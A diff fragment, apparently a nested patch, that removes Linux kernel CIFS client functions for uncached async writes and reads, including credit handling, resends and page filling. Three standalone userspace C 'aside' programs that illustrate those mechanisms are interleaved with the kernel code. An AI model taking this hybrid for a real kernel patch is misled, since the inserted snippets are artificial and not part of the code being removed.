+-		do {
+-			rc = server->ops->wait_mtu_credits(server, wdata->bytes,
+-						&wsize, &credits);
+-			if (rc)
+-				goto fail;
+-
+-			if (wsize < wdata->bytes) {
+-				add_credits_and_wake_if(server, &credits, 0);
+-				msleep(1000);
+-			}
+-		} while (wsize < wdata->bytes);
+-		wdata->credits = credits;
+-
+-		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
+-
+-		if (!rc) {
+-			if (wdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else {
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-				if (wdata->mr) {
+-					wdata->mr->need_invalidate = true;
+-					smbd_deregister_mr(wdata->mr);
+-					wdata->mr = NULL;
+-				}
+-#endif
+-				rc = server->ops->async_writev(wdata,
+-					cifs_uncached_writedata_release);
+-			}
+-		}
+-
+-		/* If the write was successfully sent, we are done */
+-		if (!rc) {
+-			list_add_tail(&wdata->list, wdata_list);
+-			return 0;
+-		}
+-
+-		/* Roll back credits and retry if needed */
+-		add_credits_and_wake_if(server, &wdata->credits, 0);
+-	} while (rc == -EAGAIN);
+-
+-fail:
+-	kref_put(&wdata->refcount, cifs_uncached_writedata_release);
+-	return rc;
+-}
+-
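+-/*
+- * Split an uncached write into wsize-sized async requests, either pinning
+- * the caller's pages directly (direct I/O) or copying from the iterator
+- * into freshly allocated pages, queueing each wdata on wdata_list.
+- */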
+-static int
+-cifs_write_from_iter(loff_t offset, size_t len, struct iov_iter *from,
+-		     struct cifsFileInfo *open_file,
+-		     struct cifs_sb_info *cifs_sb, struct list_head *wdata_list,
+-		     struct cifs_aio_ctx *ctx)
+-{
+-	int rc = 0;
+-	size_t cur_len;
+-	unsigned long nr_pages, num_pages, i;
+-	struct cifs_writedata *wdata;
+-	struct iov_iter saved_from = *from;
+-	loff_t saved_offset = offset;
+-	pid_t pid;
+-	struct TCP_Server_Info *server;
+-	struct page **pagevec;
+-	size_t start;
+-	unsigned int xid;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = open_file->pid;
+-	else
+-		pid = current->tgid;
+-
+-	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
+-	xid = get_xid();
+-
+-	do {
+-		unsigned int wsize;
+-		struct cifs_credits credits_on_stack;
+-		struct cifs_credits *credits = &credits_on_stack;
+-
+-		if (open_file->invalidHandle) {
+-			rc = cifs_reopen_file(open_file, false);
+-			if (rc == -EAGAIN)
+-				continue;
+-			else if (rc)
+-				break;
+-		}
+-
+-		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->wsize,
+-						   &wsize, credits);
+-		if (rc)
+-			break;
+-
+-		cur_len = min_t(const size_t, len, wsize);
+-
+-		if (ctx->direct_io) {
+-			ssize_t result;
+-
+-			result = iov_iter_get_pages_alloc2(
+-				from, &pagevec, cur_len, &start);
+-			if (result < 0) {
+-				cifs_dbg(VFS,
+-					 "direct_writev couldn't get user pages (rc=%zd) iter type %d iov_offset %zd count %zd\n",
+-					 result, iov_iter_type(from),
+-					 from->iov_offset, from->count);
+-				dump_stack();
+-
+-				rc = result;
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-			cur_len = (size_t)result;
+-
+-			nr_pages =
+-				(cur_len + start + PAGE_SIZE - 1) / PAGE_SIZE;
+-
+-			wdata = cifs_writedata_direct_alloc(pagevec,
+-					     cifs_uncached_writev_complete);
+-			if (!wdata) {
+-				rc = -ENOMEM;
+-				for (i = 0; i < nr_pages; i++)
+-					put_page(pagevec[i]);
+-				kvfree(pagevec);
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-			wdata->page_offset = start;
+-			wdata->tailsz =
+-				nr_pages > 1 ?
+-					cur_len - (PAGE_SIZE - start) -
+-					(nr_pages - 2) * PAGE_SIZE :
+-					cur_len;
+-		} else {
+-			nr_pages = get_numpages(wsize, len, &cur_len);
+-			wdata = cifs_writedata_alloc(nr_pages,
+-					     cifs_uncached_writev_complete);
+-			if (!wdata) {
+-				rc = -ENOMEM;
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-			rc = cifs_write_allocate_pages(wdata->pages, nr_pages);
+-			if (rc) {
+-				kvfree(wdata->pages);
+-				kfree(wdata);
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-			num_pages = nr_pages;
+-			rc = wdata_fill_from_iovec(
+-				wdata, from, &cur_len, &num_pages);
+-			if (rc) {
+-				for (i = 0; i < nr_pages; i++)
+-					put_page(wdata->pages[i]);
+-				kvfree(wdata->pages);
+-				kfree(wdata);
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-			/*
+-			 * Bring nr_pages down to the number of pages we
+-			 * actually used, and free any pages that we didn't use.
+-			 */
+-			for ( ; nr_pages > num_pages; nr_pages--)
+-				put_page(wdata->pages[nr_pages - 1]);
+-
+-			wdata->tailsz = cur_len - ((nr_pages - 1) * PAGE_SIZE);
+-		}
+-
+-		wdata->sync_mode = WB_SYNC_ALL;
+-		wdata->nr_pages = nr_pages;
+-		wdata->offset = (__u64)offset;
+-		wdata->cfile = cifsFileInfo_get(open_file);
+-		wdata->server = server;
+-		wdata->pid = pid;
+-		wdata->bytes = cur_len;
+-		wdata->pagesz = PAGE_SIZE;
+-		wdata->credits = credits_on_stack;
+-		wdata->ctx = ctx;
+-		kref_get(&ctx->refcount);
+-
+-		rc = adjust_credits(server, &wdata->credits, wdata->bytes);
+-
+-		if (!rc) {
+-			if (wdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else
+-				rc = server->ops->async_writev(wdata,
+-					cifs_uncached_writedata_release);
+-		}
+-
+-		if (rc) {
+-			add_credits_and_wake_if(server, &wdata->credits, 0);
+-			kref_put(&wdata->refcount,
+-				 cifs_uncached_writedata_release);
+-			if (rc == -EAGAIN) {
+-				*from = saved_from;
+-				iov_iter_advance(from, offset - saved_offset);
+-				continue;
+-			}
+-			break;
+-		}
+-
+-		list_add_tail(&wdata->list, wdata_list);
+-		offset += cur_len;
+-		len -= cur_len;
+-	} while (len > 0);
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static void collect_uncached_write_data(struct cifs_aio_ctx *ctx)
+-{
+-	struct cifs_writedata *wdata, *tmp;
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb;
+-	struct dentry *dentry = ctx->cfile->dentry;
+-	ssize_t rc;
+-
+-	tcon = tlink_tcon(ctx->cfile->tlink);
+-	cifs_sb = CIFS_SB(dentry->d_sb);
+-
+-	mutex_lock(&ctx->aio_mutex);
+-
+-	if (list_empty(&ctx->list)) {
+-		mutex_unlock(&ctx->aio_mutex);
+-		return;
+-	}
+-
+-	rc = ctx->rc;
+-	/*
+-	 * Wait for and collect replies for any successful sends in order of
+-	 * increasing offset. Once an error is hit, return without waiting
+-	 * for any more replies.
+-	 */
+-restart_loop:
+-	list_for_each_entry_safe(wdata, tmp, &ctx->list, list) {
+-		if (!rc) {
+-			if (!try_wait_for_completion(&wdata->done)) {
+-				mutex_unlock(&ctx->aio_mutex);
+-				return;
+-			}
+-
+-			if (wdata->result)
+-				rc = wdata->result;
+-			else
+-				ctx->total_len += wdata->bytes;
+-
+-			/* resend call if it's a retryable error */
+-			if (rc == -EAGAIN) {
+-				struct list_head tmp_list;
+-				struct iov_iter tmp_from = ctx->iter;
+-
+-				INIT_LIST_HEAD(&tmp_list);
+-				list_del_init(&wdata->list);
+-
+-				if (ctx->direct_io)
+-					rc = cifs_resend_wdata(
+-						wdata, &tmp_list, ctx);
+-				else {
+-					iov_iter_advance(&tmp_from,
+-						 wdata->offset - ctx->pos);
+-
+-					rc = cifs_write_from_iter(wdata->offset,
+-						wdata->bytes, &tmp_from,
+-						ctx->cfile, cifs_sb, &tmp_list,
+-						ctx);
+-
+-					kref_put(&wdata->refcount,
+-						cifs_uncached_writedata_release);
+-				}
+-
+-				list_splice(&tmp_list, &ctx->list);
+-				goto restart_loop;
+-			}
+-		}
+-		list_del_init(&wdata->list);
+-		kref_put(&wdata->refcount, cifs_uncached_writedata_release);
+-	}
+-
+-	cifs_stats_bytes_written(tcon, ctx->total_len);
+-	set_bit(CIFS_INO_INVALID_MAPPING, &CIFS_I(dentry->d_inode)->flags);
+-
+-	ctx->rc = (rc == 0) ? ctx->total_len : rc;
+-
+-	mutex_unlock(&ctx->aio_mutex);
+-
+-	if (ctx->iocb && ctx->iocb->ki_complete)
+-		ctx->iocb->ki_complete(ctx->iocb, ctx->rc);
+-	else
+-		complete(&ctx->done);
+-}
+-
+-static ssize_t __cifs_writev(
+-	struct kiocb *iocb, struct iov_iter *from, bool direct)
+-{
+-	struct file *file = iocb->ki_filp;
+-	ssize_t total_written = 0;
+-	struct cifsFileInfo *cfile;
+-	struct cifs_tcon *tcon;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_aio_ctx *ctx;
+-	struct iov_iter saved_from = *from;
+-	size_t len = iov_iter_count(from);
+-	int rc;
+-
+-	/*
+-	 * iov_iter_get_pages_alloc doesn't work with ITER_KVEC.
+-	 * In this case, fall back to the non-direct write function.
+-	 * This could be improved by getting pages directly in the
+-	 * ITER_KVEC case.
+-	 */
+-	if (direct && iov_iter_is_kvec(from)) {
+-		cifs_dbg(FYI, "use non-direct cifs_writev for kvec I/O\n");
+-		direct = false;
+-	}
+-
+-	rc = generic_write_checks(iocb, from);
+-	if (rc <= 0)
+-		return rc;
+-
+-	cifs_sb = CIFS_FILE_SB(file);
+-	cfile = file->private_data;
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	if (!tcon->ses->server->ops->async_writev)
+-		return -ENOSYS;
+-
+-	ctx = cifs_aio_ctx_alloc();
+-	if (!ctx)
+-		return -ENOMEM;
+-
+-	ctx->cfile = cifsFileInfo_get(cfile);
+-
+-	if (!is_sync_kiocb(iocb))
+-		ctx->iocb = iocb;
+-
+-	ctx->pos = iocb->ki_pos;
+-
+-	if (direct) {
+-		ctx->direct_io = true;
+-		ctx->iter = *from;
+-		ctx->len = len;
+-	} else {
+-		rc = setup_aio_ctx_iter(ctx, from, ITER_SOURCE);
+-		if (rc) {
+-			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-			return rc;
+-		}
+-	}
+-
+-	/* grab a lock here because response handlers can access ctx */
+-	mutex_lock(&ctx->aio_mutex);
+-
+-	rc = cifs_write_from_iter(iocb->ki_pos, ctx->len, &saved_from,
+-				  cfile, cifs_sb, &ctx->list, ctx);
+-
+-	/*
+-	 * If at least one write was successfully sent, then discard any rc
+-	 * value from the later writes. If a later write succeeds, then
+-	 * we'll end up returning whatever was written. If it fails, then
+-	 * we'll get a new rc value from that.
+-	 */
+-	if (!list_empty(&ctx->list))
+-		rc = 0;
+-
+-	mutex_unlock(&ctx->aio_mutex);
+-
+-	if (rc) {
+-		kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-		return rc;
+-	}
+-
+-	if (!is_sync_kiocb(iocb)) {
+-		kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-		return -EIOCBQUEUED;
+-	}
+-
+-	rc = wait_for_completion_killable(&ctx->done);
+-	if (rc) {
+-		mutex_lock(&ctx->aio_mutex);
+-		ctx->rc = rc = -EINTR;
+-		total_written = ctx->total_len;
+-		mutex_unlock(&ctx->aio_mutex);
+-	} else {
+-		rc = ctx->rc;
+-		total_written = ctx->total_len;
+-	}
+-
+-	kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-
+-	if (unlikely(!total_written))
+-		return rc;
+-
+-	iocb->ki_pos += total_written;
+-	return total_written;
+-}
+-
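/*
 * Aside: a tiny single-threaded model, not from this patch and under
 * assumed names (kiocb_model, submit_write), of how __cifs_writev()
 * above splits sync and async callers: an iocb with a ki_complete
 * callback gets -EIOCBQUEUED and is finished later; a sync iocb blocks
 * until the result is known.
 */
#include <stdio.h>

#define EIOCBQUEUED 529	/* same value the kernel uses */

struct kiocb_model {
	void (*ki_complete)(struct kiocb_model *iocb, long res);
};

static void aio_done(struct kiocb_model *iocb, long res)
{
	printf("async completion delivered: %ld bytes\n", res);
}

static long submit_write(struct kiocb_model *iocb, long len)
{
	if (iocb->ki_complete) {
		/* async: report the result via the callback, return queued */
		iocb->ki_complete(iocb, len);
		return -EIOCBQUEUED;
	}
	/* sync: the caller "waited"; hand the byte count straight back */
	return len;
}

int main(void)
{
	struct kiocb_model sync_iocb = { 0 };
	struct kiocb_model async_iocb = { aio_done };

	printf("sync returned %ld\n", submit_write(&sync_iocb, 4096));
	printf("async returned %ld\n", submit_write(&async_iocb, 4096));
	return 0;
}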
+-ssize_t cifs_direct_writev(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct file *file = iocb->ki_filp;
+-
+-	cifs_revalidate_mapping(file->f_inode);
+-	return __cifs_writev(iocb, from, true);
+-}
+-
+-ssize_t cifs_user_writev(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	return __cifs_writev(iocb, from, false);
+-}
+-
+-static ssize_t
+-cifs_writev(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct file *file = iocb->ki_filp;
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
+-	struct inode *inode = file->f_mapping->host;
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
+-	ssize_t rc;
+-
+-	inode_lock(inode);
+-	/*
+-	 * We need to hold the sem to be sure nobody modifies lock list
+-	 * with a brlock that prevents writing.
+-	 */
+-	down_read(&cinode->lock_sem);
+-
+-	rc = generic_write_checks(iocb, from);
+-	if (rc <= 0)
+-		goto out;
+-
+-	if (!cifs_find_lock_conflict(cfile, iocb->ki_pos, iov_iter_count(from),
+-				     server->vals->exclusive_lock_type, 0,
+-				     NULL, CIFS_WRITE_OP))
+-		rc = __generic_file_write_iter(iocb, from);
+-	else
+-		rc = -EACCES;
+-out:
+-	up_read(&cinode->lock_sem);
+-	inode_unlock(inode);
+-
+-	if (rc > 0)
+-		rc = generic_write_sync(iocb, rc);
+-	return rc;
+-}
+-
+-ssize_t
+-cifs_strict_writev(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)
+-						iocb->ki_filp->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	ssize_t written;
+-
+-	written = cifs_get_writer(cinode);
+-	if (written)
+-		return written;
+-
+-	if (CIFS_CACHE_WRITE(cinode)) {
+-		if (cap_unix(tcon->ses) &&
+-		(CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability))
+-		  && ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0)) {
+-			written = generic_file_write_iter(iocb, from);
+-			goto out;
+-		}
+-		written = cifs_writev(iocb, from);
+-		goto out;
+-	}
+-	/*
+-	 * For non-oplocked files in strict cache mode we need to write the data
+-	 * to the server exactly from pos to pos+len-1 rather than flush all
+-	 * affected pages, because that may cause an error with mandatory locks
+-	 * on these pages but not on the region from pos to pos+len-1.
+-	 */
+-	written = cifs_user_writev(iocb, from);
+-	if (CIFS_CACHE_READ(cinode)) {
+-		/*
+-		 * We have read level caching and we have just sent a write
+-		 * request to the server thus making data in the cache stale.
+-		 * Zap the cache and set oplock/lease level to NONE to avoid
+-		 * reading stale data from the cache. All subsequent read
+-		 * operations will read new data from the server.
+-		 */
+-		cifs_zap_mapping(inode);
+-		cifs_dbg(FYI, "Set Oplock/Lease to NONE for inode=%p after write\n",
+-			 inode);
+-		cinode->oplock = 0;
+-	}
+-out:
+-	cifs_put_writer(cinode);
+-	return written;
+-}
+-
+-static struct cifs_readdata *
+-cifs_readdata_direct_alloc(struct page **pages, work_func_t complete)
+-{
+-	struct cifs_readdata *rdata;
+-
+-	rdata = kzalloc(sizeof(*rdata), GFP_KERNEL);
+-	if (rdata != NULL) {
+-		rdata->pages = pages;
+-		kref_init(&rdata->refcount);
+-		INIT_LIST_HEAD(&rdata->list);
+-		init_completion(&rdata->done);
+-		INIT_WORK(&rdata->work, complete);
+-	}
+-
+-	return rdata;
+-}
+-
+-static struct cifs_readdata *
+-cifs_readdata_alloc(unsigned int nr_pages, work_func_t complete)
+-{
+-	struct page **pages =
+-		kcalloc(nr_pages, sizeof(struct page *), GFP_KERNEL);
+-	struct cifs_readdata *ret = NULL;
+-
+-	if (pages) {
+-		ret = cifs_readdata_direct_alloc(pages, complete);
+-		if (!ret)
+-			kfree(pages);
+-	}
+-
+-	return ret;
+-}
+-
+-void
+-cifs_readdata_release(struct kref *refcount)
+-{
+-	struct cifs_readdata *rdata = container_of(refcount,
+-					struct cifs_readdata, refcount);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	if (rdata->mr) {
+-		smbd_deregister_mr(rdata->mr);
+-		rdata->mr = NULL;
+-	}
+-#endif
+-	if (rdata->cfile)
+-		cifsFileInfo_put(rdata->cfile);
+-
+-	kvfree(rdata->pages);
+-	kfree(rdata);
+-}
+-
+-static int
+-cifs_read_allocate_pages(struct cifs_readdata *rdata, unsigned int nr_pages)
+-{
+-	int rc = 0;
+-	struct page *page;
+-	unsigned int i;
+-
+-	for (i = 0; i < nr_pages; i++) {
+-		page = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
+-		if (!page) {
+-			rc = -ENOMEM;
+-			break;
+-		}
+-		rdata->pages[i] = page;
+-	}
+-
+-	if (rc) {
+-		unsigned int nr_page_failed = i;
+-
+-		for (i = 0; i < nr_page_failed; i++) {
+-			put_page(rdata->pages[i]);
+-			rdata->pages[i] = NULL;
+-		}
+-	}
+-	return rc;
+-}
+-
+-static void
+-cifs_uncached_readdata_release(struct kref *refcount)
+-{
+-	struct cifs_readdata *rdata = container_of(refcount,
+-					struct cifs_readdata, refcount);
+-	unsigned int i;
+-
+-	kref_put(&rdata->ctx->refcount, cifs_aio_ctx_release);
+-	for (i = 0; i < rdata->nr_pages; i++) {
+-		put_page(rdata->pages[i]);
+-	}
+-	cifs_readdata_release(refcount);
+-}
+-
+-/**
+- * cifs_readdata_to_iov - copy data from pages in response to an iovec
+- * @rdata:	the readdata response with list of pages holding data
+- * @iter:	destination for our data
+- *
+- * This function copies data from a list of pages in a readdata response into
+- * an array of iovecs. It will first calculate where the data should go
+- * based on the info in the readdata and then copy the data into that spot.
+- */
+-static int
+-cifs_readdata_to_iov(struct cifs_readdata *rdata, struct iov_iter *iter)
+-{
+-	size_t remaining = rdata->got_bytes;
+-	unsigned int i;
+-
+-	for (i = 0; i < rdata->nr_pages; i++) {
+-		struct page *page = rdata->pages[i];
+-		size_t copy = min_t(size_t, remaining, PAGE_SIZE);
+-		size_t written;
+-
+-		if (unlikely(iov_iter_is_pipe(iter))) {
+-			void *addr = kmap_atomic(page);
+-
+-			written = copy_to_iter(addr, copy, iter);
+-			kunmap_atomic(addr);
+-		} else
+-			written = copy_page_to_iter(page, 0, copy, iter);
+-		remaining -= written;
+-		if (written < copy && iov_iter_count(iter) > 0)
+-			break;
+-	}
+-	return remaining ? -EFAULT : 0;
+-}
+-
+-static void collect_uncached_read_data(struct cifs_aio_ctx *ctx);
+-
+-static void
+-cifs_uncached_readv_complete(struct work_struct *work)
+-{
+-	struct cifs_readdata *rdata = container_of(work,
+-						struct cifs_readdata, work);
+-
+-	complete(&rdata->done);
+-	collect_uncached_read_data(rdata->ctx);
+-	/* the call below can possibly free the last ref to the aio ctx */
+-	kref_put(&rdata->refcount, cifs_uncached_readdata_release);
+-}
+-
+-static int
+-uncached_fill_pages(struct TCP_Server_Info *server,
+-		    struct cifs_readdata *rdata, struct iov_iter *iter,
+-		    unsigned int len)
+-{
+-	int result = 0;
+-	unsigned int i;
+-	unsigned int nr_pages = rdata->nr_pages;
+-	unsigned int page_offset = rdata->page_offset;
+-
+-	rdata->got_bytes = 0;
+-	rdata->tailsz = PAGE_SIZE;
+-	for (i = 0; i < nr_pages; i++) {
+-		struct page *page = rdata->pages[i];
+-		size_t n;
+-		unsigned int segment_size = rdata->pagesz;
+-
+-		if (i == 0)
+-			segment_size -= page_offset;
+-		else
+-			page_offset = 0;
+-
+-		if (len <= 0) {
+-			/* no need to hold page hostage */
+-			rdata->pages[i] = NULL;
+-			rdata->nr_pages--;
+-			put_page(page);
+-			continue;
+-		}
+-
+-		n = len;
+-		if (len >= segment_size)
+-			/* enough data to fill the page */
+-			n = segment_size;
+-		else
+-			rdata->tailsz = len;
+-		len -= n;
+-
+-		if (iter)
+-			result = copy_page_from_iter(
+-					page, page_offset, n, iter);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-		else if (rdata->mr)
+-			result = n;
+-#endif
+-		else
+-			result = cifs_read_page_from_socket(
+-					server, page, page_offset, n);
+-		if (result < 0)
+-			break;
+-
+-		rdata->got_bytes += result;
+-	}
+-
+-	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
+-						rdata->got_bytes : result;
+-}
+-
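/*
 * Aside: not from this patch.  The fill loop above reads the first page
 * from page_offset to the page end, full pages after that, and records
 * the short final chunk as tailsz.  A sketch of that slicing, with an
 * assumed 4KiB page and invented sample lengths:
 */
#include <stdio.h>

#define PAGE_SIZE 4096U

int main(void)
{
	unsigned int len = 9000, page_offset = 512, i;

	for (i = 0; len; i++) {
		unsigned int seg = PAGE_SIZE - (i == 0 ? page_offset : 0);
		unsigned int n = len < seg ? len : seg;	/* tailsz on last page */

		printf("page %u: %u bytes\n", i, n);	/* 3584, 4096, 1320 */
		len -= n;
	}
	return 0;
}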
+-static int
+-cifs_uncached_read_into_pages(struct TCP_Server_Info *server,
+-			      struct cifs_readdata *rdata, unsigned int len)
+-{
+-	return uncached_fill_pages(server, rdata, NULL, len);
+-}
+-
+-static int
+-cifs_uncached_copy_into_pages(struct TCP_Server_Info *server,
+-			      struct cifs_readdata *rdata,
+-			      struct iov_iter *iter)
+-{
+-	return uncached_fill_pages(server, rdata, iter, iter->count);
+-}
+-
+-static int cifs_resend_rdata(struct cifs_readdata *rdata,
+-			struct list_head *rdata_list,
+-			struct cifs_aio_ctx *ctx)
+-{
+-	unsigned int rsize;
+-	struct cifs_credits credits;
+-	int rc;
+-	struct TCP_Server_Info *server;
+-
+-	/* XXX: should we pick a new channel here? */
+-	server = rdata->server;
+-
+-	do {
+-		if (rdata->cfile->invalidHandle) {
+-			rc = cifs_reopen_file(rdata->cfile, true);
+-			if (rc == -EAGAIN)
+-				continue;
+-			else if (rc)
+-				break;
+-		}
+-
+-		/*
+-		 * Wait for credits to resend this rdata.
+-		 * Note: we are attempting to resend the whole rdata, not in
+-		 * segments.
+-		 */
+-		do {
+-			rc = server->ops->wait_mtu_credits(server, rdata->bytes,
+-						&rsize, &credits);
+-
+-			if (rc)
+-				goto fail;
+-
+-			if (rsize < rdata->bytes) {
+-				add_credits_and_wake_if(server, &credits, 0);
+-				msleep(1000);
+-			}
+-		} while (rsize < rdata->bytes);
+-		rdata->credits = credits;
+-
+-		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+-		if (!rc) {
+-			if (rdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else {
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-				if (rdata->mr) {
+-					rdata->mr->need_invalidate = true;
+-					smbd_deregister_mr(rdata->mr);
+-					rdata->mr = NULL;
+-				}
+-#endif
+-				rc = server->ops->async_readv(rdata);
+-			}
+-		}
+-
+-		/* If the read was successfully sent, we are done */
+-		if (!rc) {
+-			/* Add to aio pending list */
+-			list_add_tail(&rdata->list, rdata_list);
+-			return 0;
+-		}
+-
+-		/* Roll back credits and retry if needed */
+-		add_credits_and_wake_if(server, &rdata->credits, 0);
+-	} while (rc == -EAGAIN);
+-
+-fail:
+-	kref_put(&rdata->refcount, cifs_uncached_readdata_release);
+-	return rc;
+-}
+-
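/*
 * Aside: not from this patch.  cifs_resend_rdata() above loops until
 * wait_mtu_credits() grants enough credits for the whole rdata, backing
 * off between attempts.  A toy model of that loop; grant_credits() is
 * an invented stand-in for the server slowly freeing credits.
 */
#include <stdio.h>

static unsigned int granted;	/* what the fake server will allow so far */

static int grant_credits(unsigned int want, unsigned int *got)
{
	granted += 4096;	/* the server frees credits over time */
	*got = granted < want ? granted : want;
	return 0;
}

int main(void)
{
	unsigned int need = 16384, rsize = 0;

	do {
		if (grant_credits(need, &rsize))
			return 1;	/* hard failure: give up */
		if (rsize < need)
			printf("only %u of %u, backing off\n", rsize, need);
	} while (rsize < need);

	printf("got %u credits, resending\n", rsize);
	return 0;
}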
+-static int
+-cifs_send_async_read(loff_t offset, size_t len, struct cifsFileInfo *open_file,
+-		     struct cifs_sb_info *cifs_sb, struct list_head *rdata_list,
+-		     struct cifs_aio_ctx *ctx)
+-{
+-	struct cifs_readdata *rdata;
+-	unsigned int npages, rsize;
+-	struct cifs_credits credits_on_stack;
+-	struct cifs_credits *credits = &credits_on_stack;
+-	size_t cur_len;
+-	int rc;
+-	pid_t pid;
+-	struct TCP_Server_Info *server;
+-	struct page **pagevec;
+-	size_t start;
+-	struct iov_iter direct_iov = ctx->iter;
+-
+-	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = open_file->pid;
+-	else
+-		pid = current->tgid;
+-
+-	if (ctx->direct_io)
+-		iov_iter_advance(&direct_iov, offset - ctx->pos);
+-
+-	do {
+-		if (open_file->invalidHandle) {
+-			rc = cifs_reopen_file(open_file, true);
+-			if (rc == -EAGAIN)
+-				continue;
+-			else if (rc)
+-				break;
+-		}
+-
+-		if (cifs_sb->ctx->rsize == 0)
+-			cifs_sb->ctx->rsize =
+-				server->ops->negotiate_rsize(tlink_tcon(open_file->tlink),
+-							     cifs_sb->ctx);
+-
+-		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->rsize,
+-						   &rsize, credits);
+-		if (rc)
+-			break;
+-
+-		cur_len = min_t(const size_t, len, rsize);
+-
+-		if (ctx->direct_io) {
+-			ssize_t result;
+-
+-			result = iov_iter_get_pages_alloc2(
+-					&direct_iov, &pagevec,
+-					cur_len, &start);
+-			if (result < 0) {
+-				cifs_dbg(VFS,
+-					 "Couldn't get user pages (rc=%zd) iter type %d iov_offset %zd count %zd\n",
+-					 result, iov_iter_type(&direct_iov),
+-					 direct_iov.iov_offset,
+-					 direct_iov.count);
+-				dump_stack();
+-
+-				rc = result;
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-			cur_len = (size_t)result;
+-
+-			rdata = cifs_readdata_direct_alloc(
+-					pagevec, cifs_uncached_readv_complete);
+-			if (!rdata) {
+-				add_credits_and_wake_if(server, credits, 0);
+-				rc = -ENOMEM;
+-				break;
+-			}
+-
+-			npages = (cur_len + start + PAGE_SIZE-1) / PAGE_SIZE;
+-			rdata->page_offset = start;
+-			rdata->tailsz = npages > 1 ?
+-				cur_len-(PAGE_SIZE-start)-(npages-2)*PAGE_SIZE :
+-				cur_len;
+-
+-		} else {
+-			npages = DIV_ROUND_UP(cur_len, PAGE_SIZE);
+-			/* allocate a readdata struct */
+-			rdata = cifs_readdata_alloc(npages,
+-					    cifs_uncached_readv_complete);
+-			if (!rdata) {
+-				add_credits_and_wake_if(server, credits, 0);
+-				rc = -ENOMEM;
+-				break;
+-			}
+-
+-			rc = cifs_read_allocate_pages(rdata, npages);
+-			if (rc) {
+-				kvfree(rdata->pages);
+-				kfree(rdata);
+-				add_credits_and_wake_if(server, credits, 0);
+-				break;
+-			}
+-
+-			rdata->tailsz = PAGE_SIZE;
+-		}
+-
+-		rdata->server = server;
+-		rdata->cfile = cifsFileInfo_get(open_file);
+-		rdata->nr_pages = npages;
+-		rdata->offset = offset;
+-		rdata->bytes = cur_len;
+-		rdata->pid = pid;
+-		rdata->pagesz = PAGE_SIZE;
+-		rdata->read_into_pages = cifs_uncached_read_into_pages;
+-		rdata->copy_into_pages = cifs_uncached_copy_into_pages;
+-		rdata->credits = credits_on_stack;
+-		rdata->ctx = ctx;
+-		kref_get(&ctx->refcount);
+-
+-		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+-
+-		if (!rc) {
+-			if (rdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else
+-				rc = server->ops->async_readv(rdata);
+-		}
+-
+-		if (rc) {
+-			add_credits_and_wake_if(server, &rdata->credits, 0);
+-			kref_put(&rdata->refcount,
+-				cifs_uncached_readdata_release);
+-			if (rc == -EAGAIN) {
+-				iov_iter_revert(&direct_iov, cur_len);
+-				continue;
+-			}
+-			break;
+-		}
+-
+-		list_add_tail(&rdata->list, rdata_list);
+-		offset += cur_len;
+-		len -= cur_len;
+-	} while (len > 0);
+-
+-	return rc;
+-}
+-
+-static void
+-collect_uncached_read_data(struct cifs_aio_ctx *ctx)
+-{
+-	struct cifs_readdata *rdata, *tmp;
+-	struct iov_iter *to = &ctx->iter;
+-	struct cifs_sb_info *cifs_sb;
+-	int rc;
+-
+-	cifs_sb = CIFS_SB(ctx->cfile->dentry->d_sb);
+-
+-	mutex_lock(&ctx->aio_mutex);
+-
+-	if (list_empty(&ctx->list)) {
+-		mutex_unlock(&ctx->aio_mutex);
+-		return;
+-	}
+-
+-	rc = ctx->rc;
+-	/* the loop below should proceed in the order of increasing offsets */
+-again:
+-	list_for_each_entry_safe(rdata, tmp, &ctx->list, list) {
+-		if (!rc) {
+-			if (!try_wait_for_completion(&rdata->done)) {
